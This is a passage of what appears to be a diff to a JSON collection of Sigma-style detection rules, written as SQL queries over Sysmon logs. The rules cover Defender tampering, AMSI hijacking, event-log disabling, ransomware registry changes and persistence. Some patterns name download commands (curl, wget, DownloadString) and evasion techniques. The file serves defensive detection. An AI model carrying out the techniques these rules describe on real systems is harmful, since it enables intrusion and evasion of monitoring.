"level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND OriginalFileName = 'ftp.exe' AND NOT (Image LIKE '%\\\\ftp.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender Security Center\\\\App and Browser protection\\\\DisallowExploitProtectionOverride%' ESCAPE '\\' AND Details = 'DWORD (00000001)')" ], - "filename": "proc_creation_win_renamed_ftp.yml" + "filename": "registry_set_disabled_exploit_guard_net_protection_on_ms_defender.yml" }, { - "title": "Firewall Rule Deleted Via Netsh.EXE", - "id": "1a5fefe6-734f-452e-a07d-fc1c35bce4b2", + "title": "Disable Tamper Protection on Windows Defender", + "id": "93d298a1-d28f-47f1-a468-d971e7796679", "status": "experimental", - "description": "Detects the removal of a port or application rule in the Windows Firewall configuration using netsh", - "author": "frack113", + "description": "Detects disabling Windows Defender Tamper Protection", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1562.004" + "attack.t1562.001" ], "falsepositives": [ - "Legitimate administration activity", - "Software installations and removal" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\netsh.exe' ESCAPE '\\' OR OriginalFileName = 'netsh.exe') AND (CommandLine LIKE '%firewall%' ESCAPE '\\' AND CommandLine LIKE '%delete %' ESCAPE '\\')) AND NOT (ParentImage LIKE '%\\\\Dropbox.exe' ESCAPE '\\' AND CommandLine LIKE '%name=Dropbox%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows 
Defender\\\\Features\\\\TamperProtection%' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_netsh_fw_delete_rule.yml" + "filename": "registry_set_disabled_tamper_protection_on_microsoft_defender.yml" }, { - "title": "WSF/JSE/JS/VBA/VBE File Execution", - "id": "1e33157c-53b1-41ad-bbcc-780b80b58288", + "title": "Suspicious Service Installed", + "id": "f2485272-a156-4773-82d7-1d178bc4905b", "status": "test", - "description": "Detects suspicious file execution by wscript and cscript", - "author": "Michael Haag", + "description": "Detects installation of NalDrv or PROCEXP152 services via registry-keys to non-system32 folders.\nBoth services are used in the tool Ghost-In-The-Logs (https://github.com/bats3c/Ghost-In-The-Logs), which uses KDU (https://github.com/hfiref0x/KDU)\n", + "author": "xknow (@xknow_infosec), xorxes (@xor_xes)", "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.t1059.007" + "attack.t1562.001", + "attack.defense_evasion" ], "falsepositives": [ - "Will need to be tuned. I recommend adding the user profile path in CommandLine if it is getting too noisy." + "Other legimate tools using this service names and drivers. Note - clever attackers may easily bypass this detection by just renaming the services. Therefore just Medium-level and don't rely on it." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName IN ('wscript.exe', 'cscript.exe') OR (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND (CommandLine LIKE '%.js%' ESCAPE '\\' OR CommandLine LIKE '%.jse%' ESCAPE '\\' OR CommandLine LIKE '%.vba%' ESCAPE '\\' OR CommandLine LIKE '%.vbe%' ESCAPE '\\' OR CommandLine LIKE '%.vbs%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\NalDrv\\\\ImagePath' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\PROCEXP152\\\\ImagePath' ESCAPE '\\')) AND NOT ((Image LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procexp.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon64.exe' ESCAPE '\\' OR Image LIKE '%\\\\procmon.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle.exe' ESCAPE '\\' OR Image LIKE '%\\\\handle64.exe' ESCAPE '\\') AND Details LIKE '%\\\\WINDOWS\\\\system32\\\\Drivers\\\\PROCEXP152.SYS%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_script_execution.yml" + "filename": "registry_set_susp_service_installed.yml" }, { - "title": "Suspicious Sigverif Execution", - "id": "7d4aaec2-08ed-4430-8b96-28420e030e04", + "title": "Potential AMSI COM Server Hijacking", + "id": "160d2780-31f7-4922-8b3a-efce30e63e96", "status": "experimental", - "description": "Detects the execution of sigverif binary as a parent process which could indicate it being used as a LOLBIN to proxy execution", + "description": "Detects changes to the AMSI come server registry key in order disable AMSI scanning functionalities. When AMSI attempts to starts its COM component, it will query its registered CLSID and return a non-existent COM server. 
This causes a load failure and prevents any scanning methods from being accessed, ultimately rendering AMSI useless", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.t1216" + "attack.t1562.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\sigverif.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\\\\InProcServer32\\\\(Default)' ESCAPE '\\') AND NOT (Details LIKE '\\%windir\\%\\\\system32\\\\amsi.dll' ESCAPE '\\'))" ], - "filename": "proc_creation_win_lolbin_sigverif.yml" + "filename": "registry_set_amsi_com_hijack.yml" }, { - "title": "Potential PowerShell Downgrade Attack", - "id": "b3512211-c67e-4707-bedc-66efc7848863", + "title": "Blackbyte Ransomware Registry", + "id": "83314318-052a-4c90-a1ad-660ece38d276", "status": "test", - "description": "Detects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0", - "author": "Harish Segar (rule)", + "description": "BlackByte set three different registry values to escalate privileges and begin setting the stage for lateral movement and encryption", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.execution", - "attack.t1059.001" + "attack.t1112" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\powershell.exe' ESCAPE '\\' AND (CommandLine LIKE '% -version 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versio 2 %' ESCAPE '\\' OR CommandLine LIKE '% -versi 2 %' ESCAPE '\\' OR CommandLine LIKE '% -vers 2 %' ESCAPE '\\' OR 
CommandLine LIKE '% -ver 2 %' ESCAPE '\\' OR CommandLine LIKE '% -ve 2 %' ESCAPE '\\' OR CommandLine LIKE '% -v 2 %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\LocalAccountTokenFilterPolicy' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Policies\\\\System\\\\EnableLinkedConnections' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem\\\\LongPathsEnabled' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_powershell_downgrade_attack.yml" + "filename": "registry_set_blackbyte_ransomware.yml" }, { - "title": "Possible Privilege Escalation via Weak Service Permissions", - "id": "d937b75f-a665-4480-88a5-2f20e9f9b22a", - "status": "test", - "description": "Detection of sc.exe utility spawning by user with Medium integrity level to change service ImagePath or FailureCommand", - "author": "Teymur Kheirkhabarov", + "title": "Disable Windows Event Logging Via Registry", + "id": "2f78da12-f7c7-430b-8b19-a28f269b77a3", + "status": "experimental", + "description": "Detects tampering with the \"Enabled\" registry key in order to disable windows logging of a windows event channel", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574.011" + "attack.t1562.002" ], "falsepositives": [ - "Unknown" + "Rare falsepositives may occur from legitimate administrators disabling specific event log for troubleshooting" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sc.exe' ESCAPE '\\' AND IntegrityLevel = 'Medium') AND ((CommandLine LIKE 
'%config%' ESCAPE '\\' AND CommandLine LIKE '%binPath%' ESCAPE '\\') OR (CommandLine LIKE '%failure%' ESCAPE '\\' AND CommandLine LIKE '%command%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Enabled' ESCAPE '\\' AND Details = 'DWORD (0x00000000)') AND NOT ((Image LIKE '%\\\\Windows\\\\system32\\\\wevtutil.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\winsxs\\\\%' ESCAPE '\\' AND Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND (TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-FileInfoMinifilter%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-ASN1\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Kernel-AppCompat\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Runtime\\\\Error\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-CAPI2/Operational\\\\%' ESCAPE '\\')) OR (Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\Microsoft-Windows-Compat-Appraiser%' ESCAPE '\\'))) AND NOT ((Image = '') OR (Image = '')))" ], - "filename": "proc_creation_win_sc_change_sevice_image_path_by_non_admin.yml" + "filename": "registry_set_disable_winevt_logging.yml" }, { - "title": "Execution via WorkFolders.exe", - "id": "0bbc6369-43e3-453d-9944-cae58821c173", - "status": "test", - "description": 
"Detects using WorkFolders.exe to execute an arbitrary control.exe", - "author": "Maxime Thiebaut (@0xThiebaut)", + "title": "Suspicious Powershell In Registry Run Keys", + "id": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "status": "experimental", + "description": "Detects potential PowerShell commands or code within registry run keys", + "author": "frack113, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1218" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate usage of the uncommon Windows Work Folders feature." + "Legitimate admin or third party scripts. Baseline according to your environment" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\control.exe' ESCAPE '\\' AND ParentImage LIKE '%\\\\WorkFolders.exe' ESCAPE '\\') AND NOT (Image LIKE 'C:\\\\Windows\\\\System32\\\\control.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND (Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%pwsh %' ESCAPE '\\' OR Details LIKE '%FromBase64String%' ESCAPE '\\' OR Details LIKE '%.DownloadFile(%' ESCAPE '\\' OR Details LIKE '%.DownloadString(%' ESCAPE '\\' OR Details LIKE '% -w hidden %' ESCAPE '\\' OR Details LIKE '% -w 1 %' ESCAPE '\\' OR Details LIKE '%-windowstyle hidden%' ESCAPE '\\' OR Details LIKE '%-window hidden%' ESCAPE '\\' OR Details LIKE '% -nop %' ESCAPE '\\' OR Details LIKE '% -encodedcommand %' ESCAPE '\\' OR Details LIKE '%-ExecutionPolicy Bypass%' ESCAPE '\\' OR Details LIKE '%Invoke-Expression%' ESCAPE '\\' OR Details LIKE '%IEX (%' ESCAPE '\\' OR Details LIKE '%Invoke-Command%' ESCAPE '\\' OR Details LIKE '%ICM -%' ESCAPE '\\' OR Details LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR Details 
LIKE '%IWR %' ESCAPE '\\' OR Details LIKE '% -noni %' ESCAPE '\\' OR Details LIKE '% -noninteractive %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_susp_workfolders.yml" + "filename": "registry_set_powershell_in_run_keys.yml" }, { - "title": "Copy .DMP/.DUMP Files From Remote Share Via Cmd.EXE", - "id": "044ba588-dff4-4918-9808-3f95e8160606", + "title": "New Root or CA or AuthRoot Certificate to Store", + "id": "d223b46b-5621-4037-88fe-fda32eead684", "status": "experimental", - "description": "Detects usage of the copy builtin cmd command to copy files with the \".dmp\"/\".dump\" extension from a remote share", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects the addition of new root, CA or AuthRoot certificates to the Windows registry", + "author": "frack113", "tags": [ - "attack.credential_access" + "attack.impact", + "attack.t1490" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\cmd.exe' ESCAPE '\\' OR OriginalFileName = 'Cmd.Exe') AND (CommandLine LIKE '%copy %' ESCAPE '\\' AND CommandLine LIKE '% \\\\\\\\\\*' ESCAPE '\\' AND (CommandLine LIKE '%.dmp%' ESCAPE '\\' OR CommandLine LIKE '%.dump%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'Setvalue' AND (TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\Root\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE 
'%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\CA\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\SystemCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\EnterpriseCertificates\\\\AuthRoot\\\\Certificates\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Blob' ESCAPE '\\' AND Details = 'Binary Data')" ], - "filename": "proc_creation_win_cmd_copy_dmp_from_share.yml" + "filename": "registry_set_install_root_or_ca_certificat.yml" }, { - "title": "Suspicious New Instance Of An Office COM Object", - "id": "9bdaf1e9-fdef-443b-8081-4341b74a7e28", + "title": "Scripted Diagnostics Turn Off Check Enabled - Registry", + "id": "7d995e63-ec83-4aa3-89d5-8a17b5c87c86", "status": "experimental", - "description": "Detects an svchost process spawning an instance of an office application. This happens when the initial word application creates an instance of one of the Office COM objects such as 'Word.Application', 'Excel.Application', etc.\nThis can be used by malicious actors to create malicious Office documents with macros on the fly. 
(See vba2clr project in the references)\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "description": "Detects enabling TurnOffCheck which can be used to bypass defense of MSDT Follina vulnerability", + "author": "Christopher Peacock @securepeacock, SCYTHE @scythe_io", "tags": [ - "attack.execution", - "attack.defense_evasion" + "attack.defense_evasion", + "attack.t1562.001" ], "falsepositives": [ - "Legitimate usage of office automation via scripting" + "Administrator actions" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (Image LIKE '%\\\\winword.exe' ESCAPE '\\' OR Image LIKE '%\\\\excel.exe' ESCAPE '\\' OR Image LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR Image LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR Image LIKE '%\\\\mspub.exe' ESCAPE '\\' OR Image LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR Image LIKE '%\\\\visio.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Policies\\\\Microsoft\\\\Windows\\\\ScriptedDiagnostics\\\\TurnOffCheck' ESCAPE '\\' AND Details = 'DWORD (0x00000001)')" ], - "filename": "proc_creation_win_office_svchost_parent.yml" + "filename": "registry_set_enabling_turnoffcheck.yml" }, { - "title": "Potential DLL Sideloading Via DeviceEnroller.EXE", - "id": "e173ad47-4388-4012-ae62-bd13f71c18a8", + "title": "Disable Privacy Settings Experience in Registry", + "id": "0372e1f9-0fd2-40f7-be1b-a7b2b848fa7b", "status": "experimental", - "description": "Detects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. 
This non-existent DLL file is named \"ShellChromeAPI.dll\".\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "@gott_cyber", + "description": "Detects registry modifications that disable Privacy Settings Experience", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1574.002" + "attack.t1562.001" ], "falsepositives": [ - "Unknown" + "Legitimate admin script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\deviceenroller.exe' ESCAPE '\\' OR OriginalFileName = 'deviceenroller.exe') AND CommandLine LIKE '%/PhoneDeepLink%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\OOBE\\\\DisablePrivacyExperience' ESCAPE '\\' AND Details = 'DWORD (0x00000000)')" ], - "filename": "proc_creation_win_deviceenroller_dll_sideloading.yml" + "filename": "registry_set_disable_privacy_settings_experience.yml" }, { - "title": "HackTool - PowerTool Execution", - "id": "a34f79a3-8e5f-4cc3-b765-de00695452c2", + "title": "Register New IFiltre For Persistence", + "id": "b23818c7-e575-4d13-8012-332075ec0a2b", "status": "experimental", - "description": "Detects the execution of the tool PowerTool which has the ability to kill a process, delete its process file, unload drivers, and delete the driver files", + "description": "Detects when an attacker register a new IFilter for an exntesion. Microsoft Windows Search uses filters to extract the content of items for inclusion in a full-text index. 
You can extend Windows Search to index new or proprietary file types by writing filters to extract the content, and property handlers to extract the properties of files", "author": "Nasreddine Bencherchali (Nextron Systems)", + "tags": [ + "attack.persistence" + ], + "falsepositives": [ + "Legitimate registration of IFilters by the OS or software" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\.%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentHandler%' ESCAPE '\\') OR (EventType = 'SetValue' AND (TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\' OR TargetObject LIKE 'HKEY\\_LOCAL\\_MACHINE\\\\SOFTWARE\\\\Classes\\\\CLSID%' ESCAPE '\\') AND TargetObject LIKE '%\\\\PersistentAddinsRegistered\\\\{89BCB740-6119-101A-BCB7-00DD010655AF}%' ESCAPE '\\')) AND NOT (((TargetObject LIKE '%\\\\CLSID\\\\{4F46F75F-199F-4C63-8B7D-86D48FE7970C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{4887767F-7ADC-4983-B576-88FB643D6F79}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D3B41FA1-01E3-49AF-AA25-1D0D824275AE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{72773E1A-B711-4d8d-81FA-B9A43B0650DD}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{098f2470-bae0-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{1AA9BF05-9A97-48c1-BA28-D9DCE795E93C}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{2e2294a9-50d7-4fe7-a09f-e6492e185884}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{34CEAC8D-CBC0-4f77-B7B1-8A60CB6DA0F7}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3B224B11-9363-407e-850F-C9E1FFACD8FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{3DDEB7A4-8ABF-4D82-B9EE-E1F4552E95BE}\\\\%' ESCAPE '\\' OR TargetObject 
LIKE '%\\\\CLSID\\\\{5645C8C1-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5645C8C4-E277-11CF-8FDA-00AA00A14F93}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{58A9EBF6-5755-4554-A67E-A2467AD1447B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{5e941d80-bf96-11cd-b579-08002b30bfeb}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{698A4FFC-63A3-4E70-8F00-376AD29363FB}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{7E9D8D44-6926-426F-AA2B-217A819A5CCE}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{8CD34779-9F10-4f9b-ADFB-B3FAEABDAB5A}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{9694E38A-E081-46ac-99A0-8743C909ACB6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{98de59a0-d175-11cd-a7bd-00006b827d94}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{AA10385A-F5AA-4EFF-B3DF-71B701E25E18}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{B4132098-7A03-423D-9463-163CB07C151F}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{d044309b-5da6-4633-b085-4ed02522e5a5}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{D169C14A-5148-4322-92C8-754FC9D018D8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{DD75716E-B42E-4978-BB60-1497B92E30C4}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E2F83EED-62DE-4A9F-9CD0-A1D40DCD13B6}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{E772CEB3-E203-4828-ADF1-765713D981B8}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{eec97550-47a9-11cf-b952-00aa0051fe20}%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CLSID\\\\{FB10BD80-A331-4e9e-9EB7-00279903AD99}\\\\%' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\'))))" + ], + "filename": "registry_set_persistence_ifilter.yml" + }, + { + "title": "Change Winevt Event Access Permission Via Registry", + "id": 
"7d9263bd-dc47-4a58-bc92-5474abab390c", + "status": "experimental", + "description": "Detects tampering with the \"ChannelAccess\" registry key in order to change access to windows event channel", + "author": "frack113", "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1562.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\PowerTool.exe' ESCAPE '\\' OR Image LIKE '%\\\\PowerTool64.exe' ESCAPE '\\') OR OriginalFileName = 'PowerTool.exe'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\WINEVT\\\\Channels\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\ChannelAccess' ESCAPE '\\' AND (Details LIKE '%(A;;0x1;;;SY)%' ESCAPE '\\' OR Details LIKE '%(A;;0x5;;;BA)%' ESCAPE '\\' OR Details LIKE '%(A;;0x1;;;LA)%' ESCAPE '\\')) AND NOT ((Image LIKE 'C:\\\\Windows\\\\servicing\\\\TrustedInstaller.exe' ESCAPE '\\') OR (Image LIKE '%\\\\TiWorker.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_hktl_powertool.yml" + "filename": "registry_set_change_winevt_channelaccess.yml" }, { - "title": "Obfuscated IP Download", - "id": "cb5a2333-56cf-4562-8fcb-22ba1bca728d", + "title": "Potential Persistence Via Visual Studio Tools for Office", + "id": "9d15044a-7cfe-4d23-8085-6ebc11df7685", "status": "experimental", - "description": "Detects use of an encoded/obfuscated version of an IP address (hex, octal...) 
in an URL combined with a download command", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "author": "Bhabesh Raj", "tags": [ - "attack.discovery" + "attack.t1137.006", + "attack.persistence" ], "falsepositives": [ - "Unknown" + "Legitimate Addin Installation" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (CommandLine LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\' OR CommandLine LIKE '%wget %' ESCAPE '\\' OR CommandLine LIKE '%curl %' ESCAPE '\\' OR CommandLine LIKE '%DownloadFile%' ESCAPE '\\' OR CommandLine LIKE '%DownloadString%' ESCAPE '\\') AND ((CommandLine LIKE '%//0x%' ESCAPE '\\' OR CommandLine LIKE '%.0x%' ESCAPE '\\' OR CommandLine LIKE '%.00x%' ESCAPE '\\') OR (CommandLine LIKE '%http://\\%%' ESCAPE '\\' AND CommandLine LIKE '%\\%2e%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Outlook\\\\Addins\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Office\\\\Word\\\\Addins\\\\%' ESCAPE 